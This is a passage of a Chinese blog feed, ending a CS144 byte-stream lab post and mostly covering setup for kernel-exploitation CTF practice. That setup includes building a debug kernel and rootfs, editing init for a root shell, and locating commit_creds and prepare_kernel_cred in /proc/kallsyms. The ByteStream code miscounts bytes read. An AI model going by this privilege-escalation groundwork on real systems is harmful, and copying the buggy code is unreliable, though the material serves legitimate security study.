class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">ByteStream::<span class="built_in">ByteStream</span>(<span class="type">const</span> <span class="type">size_t</span> capacity)</span><br><span class="line">    : _queue(), _capacity_size(capacity), _written_size(<span class="number">0</span>), _read_size(<span class="number">0</span>), _end_input(<span class="literal">false</span>), _error(<span class="literal">false</span>) &#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::write</span><span class="params">(<span class="type">const</span> string &amp;data)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (_end_input)</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="type">size_t</span> write_size = <span class="built_in">min</span>(data.<span class="built_in">size</span>(), _capacity_size - _queue.<span class="built_in">size</span>());</span><br><span class="line">    _written_size += write_size;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; write_size; i++)</span><br><span class="line">        _queue.<span class="built_in">push_back</span>(data[i]);</span><br><span class="line">    <span class="keyword">return</span> write_size;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] len bytes will be copied from the output side of the buffer</span></span><br><span class="line"><span class="function">string <span class="title">ByteStream::peek_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> pop_size = <span class="built_in">min</span>(len, _queue.<span class="built_in">size</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">string</span>(_queue.<span class="built_in">begin</span>(), _queue.<span class="built_in">begin</span>() + pop_size);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! \param[in] len bytes will be removed from the output side of the buffer</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ByteStream::pop_output</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> </span>&#123;</span><br><span class="line">    <span class="type">size_t</span> pop_size = <span class="built_in">min</span>(len, _queue.<span class="built_in">size</span>());</span><br><span class="line">    _read_size += len;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; pop_size; i++)</span><br><span class="line">        _queue.<span class="built_in">pop_front</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//! Read (i.e., copy and then pop) the next &quot;len&quot; bytes of the stream</span></span><br><span class="line"><span class="comment">//! \param[in] len bytes will be popped and returned</span></span><br><span class="line"><span class="comment">//! \returns a string</span></span><br><span class="line"><span class="function">std::string <span class="title">ByteStream::read</span><span class="params">(<span class="type">const</span> <span class="type">size_t</span> len)</span> </span>&#123;</span><br><span class="line">    string data = <span class="keyword">this</span>-&gt;<span class="built_in">peek_output</span>(len);</span><br><span class="line">    <span class="keyword">this</span>-&gt;<span class="built_in">pop_output</span>(len);</span><br><span class="line">    <span class="keyword">return</span> data;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">ByteStream::end_input</span><span class="params">()</span> </span>&#123; _end_input = <span class="literal">true</span>; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ByteStream::input_ended</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _end_input; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::buffer_size</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _queue.<span class="built_in">size</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ByteStream::buffer_empty</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _queue.<span class="built_in">empty</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ByteStream::eof</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _end_input &amp;&amp; _queue.<span class="built_in">empty</span>(); &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::bytes_written</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _written_size; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::bytes_read</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _read_size; &#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">ByteStream::remaining_capacity</span><span class="params">()</span> <span class="type">const</span> </span>&#123; <span class="keyword">return</span> _capacity_size - _queue.<span class="built_in">size</span>(); &#125;</span><br></pre></td></tr></table></figure><p>这个 Lab0 还是比较简单的，可以看到 check 跑的非常成功：</p><p><img src="/2021/11/cs144-lab0/image-20211107094712926.png" alt="image-20211107094712926"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了笔者配置 CS144 计算机网络实验环境的一些步骤。&lt;/p&gt;
&lt;p&gt;CS144 Lab0 实验指导书 - &lt;a href=&quot;https://cs144.github.io/assignments/lab0.pdf&quot;&gt;Lab Checkpoint 0: networking warmup&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;个人 CS144 实验项目地址 - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>Kernel pwn CTF 入门</title>
    <link href="https://kiprey.github.io/2021/10/kernel_pwn_introduction/"/>
    <id>https://kiprey.github.io/2021/10/kernel_pwn_introduction/</id>
    <published>2021-10-02T05:39:22.000Z</published>
    <updated>2025-11-24T03:59:40.022Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>内核 CTF 入门，主要参考 <a href="https://wiki.x10sec.org/pwn/linux/kernel-mode/environment/readme/">CTF-Wiki</a>。</p><span id="more"></span><h2 id="二、环境配置">二、环境配置</h2><ul><li><p>调试内核需要一个优秀的 gdb 插件，这里选用 gef。</p><blockquote><p>根据其他师傅描述，peda 和 pwndbg 在调试内核时会有很多玄学问题。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pip3 install capstone unicorn keystone-engine ropper</span><br><span class="line">git <span class="built_in">clone</span> https://github.com/hugsy/gef.git</span><br><span class="line"><span class="built_in">echo</span> <span class="built_in">source</span> `<span class="built_in">pwd</span>`/gef/gef.py &gt;&gt; ~/.gdbinit</span><br></pre></td></tr></table></figure></li><li><p>去<a href="https://mirrors.tuna.tsinghua.edu.cn/kernel/">清华源</a>下载 Linux kernel 压缩包并解压：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.9.8.tar.xz</span><br><span class="line">unxz linux-5.9.8.tar.xz</span><br><span class="line">tar -xf linux-5.9.8.tar</span><br></pre></td></tr></table></figure></li><li><p>进入项目文件夹，进行 makefile 配置</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> linux-5.9.8</span><br><span class="line">make menuconfig</span><br></pre></td></tr></table></figure><p>在其中勾选</p><ul><li><code>Kernel hacking -&gt; Compile-time checks and compiler options -&gt; Compile the kernel with debug info</code></li><li><code>Kernel hacking -&gt; Generic Kernel Debugging Instruments -&gt; KGDB: kernel debugger</code></li></ul><p>之后保存配置并退出</p></li><li><p>开始编译内核（默认 32 位）</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make -j 8 bzImage</span><br></pre></td></tr></table></figure><blockquote><p>不推荐直接 <code>make -j 8</code>，因为它会编译很多很多大概率用不上的东西。</p></blockquote><p>这里有些小坑：</p><ul><li><p>缺失依赖项。</p><p>解决方法：根据 make 的报错信息来安装依赖项。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install libelf-dev</span><br></pre></td></tr></table></figure></li><li><p><code>make[1]: *** No rule to make target 'debian/certs/debian-uefi-certs.pem', needed by 'certs/x509_certificate_list'.  Stop.</code></p><p>解决方法：将 <code>.config</code> 中的 <code>CONFIG_SYSTEM_TRUSTED_KEYS</code> 内容置空，然后重新 make。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#</span></span><br><span class="line"><span class="comment"># Certificates for signature checking</span></span><br><span class="line"><span class="comment">#</span></span><br><span class="line">CONFIG_SYSTEM_TRUSTED_KEYS=<span class="string">&quot;&quot;</span> <span class="comment"># 置空, 不要删除当前条目</span></span><br></pre></td></tr></table></figure></li></ul><p>等出现了以下信息后则编译完成：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Setup is 15420 bytes (padded to 15872 bytes).</span><br><span class="line">System is 5520 kB</span><br><span class="line">CRC 70701790</span><br><span class="line">Kernel: arch/x86/boot/bzImage is ready  (#2)</span><br></pre></td></tr></table></figure></li><li><p>最后在启动内核前，先构建一个文件系统，否则内核会因为没有文件系统而报错：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)</span><br></pre></td></tr></table></figure><p>首先下载一下 busybox 源代码：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">wget https://busybox.net/downloads/busybox-1.34.1.tar.bz2</span><br><span class="line">tar -jxf busybox-1.34.1.tar.bz2</span><br></pre></td></tr></table></figure><p>之后配置 makefile：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> busybox-1.34.1</span><br><span class="line">make menuconfig</span><br><span class="line">make -j 8</span><br></pre></td></tr></table></figure><p>在 menuconfig 页面中，</p><ul><li><p>Setttings 选中 Build static binary (no shared libs), 使其编译成静态链接的文件（因为 kernel 不提供 libc)</p><p>需要注意的是，静态编译与链接需要额外安装一个依赖项 <code>glibc-static</code>。使用以下命令安装：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># redhat/centos系列安装:</span></span><br><span class="line"><span class="built_in">sudo</span> yum install glibc-static</span><br><span class="line"><span class="comment"># debian/ubuntu系列安装</span></span><br><span class="line"><span class="built_in">sudo</span> apt-get install libc6-dev</span><br></pre></td></tr></table></figure></li><li><p>在 Linux System Utilities 中取消选中 Support mounting NFS file systems on Linux &lt; 2.6.23 (NEW)</p><blockquote><p>当前版本默认没有选中该项，因此可以跳过。</p></blockquote></li></ul><p>编译完成后，使用 <code>make install</code>命令，将生成文件夹<code>_install</code>，该目录将成为我们的 rootfs。</p><p>接下来在 <code>_install</code> 文件夹下执行以创建一系列文件：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> -p  proc sys dev etc/init.d</span><br></pre></td></tr></table></figure><p>之后，在 rootfs 下（即 <code>_install</code> 文件夹下）编写以下 init 挂载脚本：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;INIT SCRIPT&quot;</span></span><br><span class="line"><span class="built_in">mkdir</span> /tmp</span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">mount -t debugfs none /sys/kernel/debug</span><br><span class="line">mount -t tmpfs none /tmp</span><br><span class="line"><span class="built_in">echo</span> -e <span class="string">&quot;Boot took <span class="subst">$(cut -d&#x27; &#x27; -f1 /proc/uptime)</span> seconds&quot;</span></span><br><span class="line">setsid /bin/cttyhack setuidgid 1000 /bin/sh</span><br></pre></td></tr></table></figure><p>最后设置 init 脚本的权限，并将 rootfs 打包：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">chmod</span> +x ./init</span><br><span class="line"><span class="comment"># 打包命令</span></span><br><span class="line">find . | cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line"><span class="comment"># 解包命令</span></span><br><span class="line"><span class="comment"># cpio -idmv &lt; rootfs.img</span></span><br></pre></td></tr></table></figure><blockquote><p>busybox的编译与安装在构建 rootfs 中不是必须的，但还是强烈建议构建 busybox，因为它提供了非常多的有用工具来辅助使用 kernel。</p></blockquote></li><li><p>使用 qemu 启动内核。以下是 CTF wiki 推荐的启动参数：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -m 64M \</span><br><span class="line">    -nographic \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd  ./rootfs.img \</span><br><span class="line">    -append <span class="string">&quot;root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr&quot;</span> \</span><br><span class="line">    -smp cores=2,threads=1 \</span><br><span class="line">    -cpu kvm64</span><br></pre></td></tr></table></figure><p>本着减少参数设置的目的，这是笔者的启动参数：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">  -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">  -initrd ./rootfs.img \</span><br><span class="line">  -append <span class="string">&quot;nokaslr&quot;</span></span><br></pre></td></tr></table></figure><blockquote><p>减少启动的参数个数，可以让我们在入门时，暂时屏蔽掉一些不必要的细节。</p><p>这里只设置了三个参数，其中：</p><ul><li><p><code>-kernel</code> 指定内核镜像文件 bzImage 路径</p></li><li><p><code>-initrd</code> 设置内核启动的内存文件系统</p></li><li><p><code>-append &quot;nokaslr&quot;</code> 关闭 Kernel ALSR 以便于调试内核</p><p>注意：<code>nokaslr</code> 可 <strong>千万千万千万别打成 <code>nokalsr</code></strong> 了。就因为这个我调试了一个下午的 kernel…</p><p>是的 CTF Wiki 上的 nokaslr 也是错的，它打成了 nokalsr （xs）</p></li></ul></blockquote><p>启动好后就可以使用内置的 shell 了。</p></li></ul><h2 id="三、内核驱动的编写与调试">三、内核驱动的编写与调试</h2><h3 id="1-构建过程">1. 构建过程</h3><p>这里我们在 linux kernel 项目包下新建了一个文件夹：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">linux-5.9.8 $ <span class="built_in">mkdir</span> mydrivers</span><br></pre></td></tr></table></figure><p>之后在该文件夹下放入一个驱动代码<code>ko_test.c</code>，代码照搬的 CTF-wiki：</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/init.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/module.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/kernel.h&gt;</span></span></span><br><span class="line">MODULE_LICENSE(<span class="string">&quot;Dual BSD/GPL&quot;</span>);</span><br><span class="line"><span class="type">static</span> <span class="type">int</span> <span class="title function_">ko_test_init</span><span class="params">(<span class="type">void</span>)</span> </span><br><span class="line">&#123;</span><br><span class="line">    printk(<span class="string">&quot;This is a test ko!\n&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="type">static</span> <span class="type">void</span> <span class="title function_">ko_test_exit</span><span class="params">(<span class="type">void</span>)</span> </span><br><span class="line">&#123;</span><br><span class="line">    printk(<span class="string">&quot;Bye Bye~\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line">module_init(ko_test_init);</span><br><span class="line">module_exit(ko_test_exit);</span><br></pre></td></tr></table></figure><p>代码编写完成后，放入一个 <code>Makefile</code>文件：</p><figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 指定声称哪些 内核模块</span></span><br><span class="line">obj-m += ko_test.o</span><br><span class="line"></span><br><span class="line"><span class="comment"># 指定内核项目路径</span></span><br><span class="line">KDIR =/usr/class/kernel_pwn/linux-5.9.8</span><br><span class="line"></span><br><span class="line"><span class="section">all:</span></span><br><span class="line">        <span class="comment"># -C 参数指定进入内核项目路径</span></span><br><span class="line">        <span class="comment"># -M 指定驱动源码的环境，使 Makefile 在构建模块之前返回到 驱动源码 目录，并在该目录中生成驱动模块</span></span><br><span class="line">        <span class="variable">$(MAKE)</span> -C <span class="variable">$(KDIR)</span> M=<span class="variable">$(PWD)</span> modules</span><br><span class="line"></span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">        rm -rf *.o *.ko *.mod.* *.symvers *.order</span><br></pre></td></tr></table></figure><blockquote><p>注意点：</p><ol><li><p>Makefile 文件名中的首字母 <code>M</code> 一定是大写，否则会报以下错误：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">scripts/Makefile.build:44: /usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile: No such file or directory</span><br><span class="line">make[2]: *** No rule to make target <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile&#x27;</span>.  Stop.</span><br></pre></td></tr></table></figure></li><li><p>Makefile 中 <code>obj-m</code> 要与刚刚的驱动代码文件名所对应，否则会报以下错误：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make[2]: *** No rule to make target <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.o&#x27;</span>, needed by <span class="string">&#x27;/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.mod&#x27;</span>.  Stop.</span><br></pre></td></tr></table></figure></li><li><p>如果make时遇到以下错误：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">makefile:6: *** missing separator.  Stop.</span><br></pre></td></tr></table></figure><p>则使用 vim 打开 Makefile，键入 <code>i</code> 以进入输入模式，然后替换掉 make 命令前的前导空格为 tab，最后键入 <code>:wq</code> 保存修改。</p></li></ol></blockquote><p>最后使用 <code>make</code> 即可编译驱动。完成后的目录内容如下所示：</p><blockquote><p>这里我们只关注 <code>ko_test.ko</code>。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ tree                  </span><br><span class="line">.</span><br><span class="line">├── ko_test.c</span><br><span class="line">├── ko_test.ko</span><br><span class="line">├── ko_test.mod</span><br><span class="line">├── ko_test.mod.c</span><br><span class="line">├── ko_test.mod.o</span><br><span class="line">├── ko_test.o</span><br><span class="line">├── Makefile</span><br><span class="line">├── modules.order</span><br><span class="line">└── Module.symvers</span><br><span class="line"></span><br><span class="line">0 directories, 9 files</span><br></pre></td></tr></table></figure><h3 id="2-运行过程">2. 运行过程</h3><p>将新编译出来的 <code>*.ko</code> 文件复制进 rootfs 文件夹（<code>busybox-1.34.1/_install</code>）下，</p><p>之后修改 <code>busybox-1.34.1/_install/init</code> 脚本中的内容：</p><blockquote><p>这里需要提权 /bin/sh， 目的是为了使用 root 权限启动 /bin/sh，使得拥有执行 <code>dmesg</code> 命令的权限。</p></blockquote><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">echo &quot;INIT SCRIPT&quot;</span><br><span class="line">mkdir /tmp</span><br><span class="line">mount -t proc none /proc</span><br><span class="line">mount -t sysfs none /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">mount -t debugfs none /sys/kernel/debug</span><br><span class="line">mount -t tmpfs none /tmp</span><br><span class="line"><span class="addition">+ insmod /ko_test.ko # 挂载内核模块</span></span><br><span class="line">echo -e &quot;Boot took $(cut -d&#x27; &#x27; -f1 /proc/uptime) seconds&quot;</span><br><span class="line"><span class="deletion">- setsid /bin/cttyhack setuidgid 1000 /bin/sh</span></span><br><span class="line"><span class="addition">+ setsid /bin/cttyhack setuidgid 0 /bin/sh # 修改 uid gid 为 0 以提权 /bin/sh 至 root。</span></span><br><span class="line"><span class="addition">+ poweroff -f # 设置 shell 退出后则关闭机器</span></span><br></pre></td></tr></table></figure><p>重新打包 rootfs 并运行 qemu，之后键入 <code>dmesg</code> 命令即可看到 ko_test 模块已被成功加载：</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211002133722875.png" alt="image-20211002133722875"></p><blockquote><p>正常情况下，执行 qemu 会弹出一个小框 GUI。若想像上图一样将启动的界面变成当前终端，则需在 qemu 启动时额外指定参数：</p><ul><li><code>-nographic</code></li><li><code>-append &quot;console=ttyS0&quot;</code></li></ul></blockquote><h3 id="3-调试过程">3. 调试过程</h3><h4 id="a-attach-qemu">a. attach qemu</h4><p>调试时最好使用 root 权限执行 <code>/bin/sh</code>，相关修改方法已经在上面说明，此处暂且不表。</p><p>在启动 qemu 时，额外指定参数 <code>-gdb tcp::1234</code> （或者等价的<code>-s</code>），之后 qemu 将做好 gdb attach 的准备。如果希望 qemu 启动后立即挂起，则必须附带 <code>-S</code> 参数。</p><p>同时，调试内核时，为了加载 vmlinux 符号表，<strong>必须额外指定 <code>-append &quot;nokaslr&quot;</code>以关闭 kernel ASLR</strong>。这样符号表才能正确的对应至内存中的指定位置，<strong>否则将无法给目标函数下断点</strong>。</p><p>qemu启动后，<strong>必须另起一个终端</strong>，键入 <code>gdb -q -ex &quot;target remote localhost:1234&quot;</code>，即可 attach 至 qemu上。</p><p>gdb attach 上 qemu 后，可以加载 vmlinux 符号表、给特定函数下断点，并输入 <code>continue</code> 以执行至目标函数处。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># qemu 指定 -S 参数后挂起，此时在gdb键入以下命令</span></span><br><span class="line">gef&gt; add-symbol-file vmlinux</span><br><span class="line">gef&gt; b start_kernel</span><br><span class="line">gef&gt; <span class="built_in">continue</span></span><br><span class="line"></span><br><span class="line">[Breakpoint 1, start_kernel () at init/main.c:837]</span><br><span class="line">......</span><br></pre></td></tr></table></figure><p>对于内核中的各个符号来说，我们也可以通过以下命令来查看一些符号在内存中的加载地址：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># grep &lt;symbol_name&gt; /proc/kalsyms</span></span><br><span class="line">grep prepare_kernel_cred  /proc/kallsyms</span><br><span class="line">grep commit_creds  /proc/kallsyms</span><br><span class="line">grep ko_test_init  /proc/kallsyms</span><br></pre></td></tr></table></figure><blockquote><p>坑点1：之前笔者编写了以下 shell 脚本：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 其他设置</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment"># **后台** 启动 qemu</span></span><br><span class="line">qemu-system-x86_64 [other args] &amp;</span><br><span class="line"><span class="comment"># 直接在当前终端打开 GDB</span></span><br><span class="line">gdb -q -ex <span class="string">&quot;target remote localhost:1234&quot;</span></span><br></pre></td></tr></table></figure><p>但在执行脚本时，当笔者在 GDB 中键入 Ctrl+C 时， SIGINT 信号将直接终止 qemu 而不是挂起内部的 kernel。因此，gdb必须在另一个终端启动才可以正常处理 Ctrl+C。</p><p>正确的脚本如下：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 其他设置</span></span><br><span class="line">[...]</span><br><span class="line"><span class="comment"># **后台** 启动 qemu</span></span><br><span class="line">qemu-system-x86_64 [other args] &amp;</span><br><span class="line"><span class="comment"># 开启新终端，在新终端中打开 GDB</span></span><br><span class="line">gnome-terminal -e <span class="string">&#x27;gdb -q -ex &quot;target remote localhost:1234&quot;&#x27;</span></span><br></pre></td></tr></table></figure></blockquote><blockquote><p>坑点2：对于 gdb gef 插件来说，最好不要使用常规的<code>target remote localhost:1234</code>语句（无需root权限）来连接远程，否则会报以下错误：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">gef➤  target remote localhost:1234</span><br><span class="line">Remote debugging using localhost:1234</span><br><span class="line">warning: No executable has been specified and target does not support</span><br><span class="line">determining executable automatically.  Try using the <span class="string">&quot;file&quot;</span> <span class="built_in">command</span>.</span><br><span class="line">0x000000000000fff0 <span class="keyword">in</span> ?? ()</span><br><span class="line">[ Legend: Modified register | Code | Heap | Stack | String ]</span><br><span class="line">──────────────────────────────────── registers ────────────────────────────────────</span><br><span class="line">[!] Command <span class="string">&#x27;context&#x27;</span> failed to execute properly, reason: <span class="string">&#x27;NoneType&#x27;</span> object has no attribute <span class="string">&#x27;all_registers&#x27;</span></span><br></pre></td></tr></table></figure><p>与之相对的，使用效果更好的 <code>gef-remote</code> 命令（需要root权限）连接 qemu：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 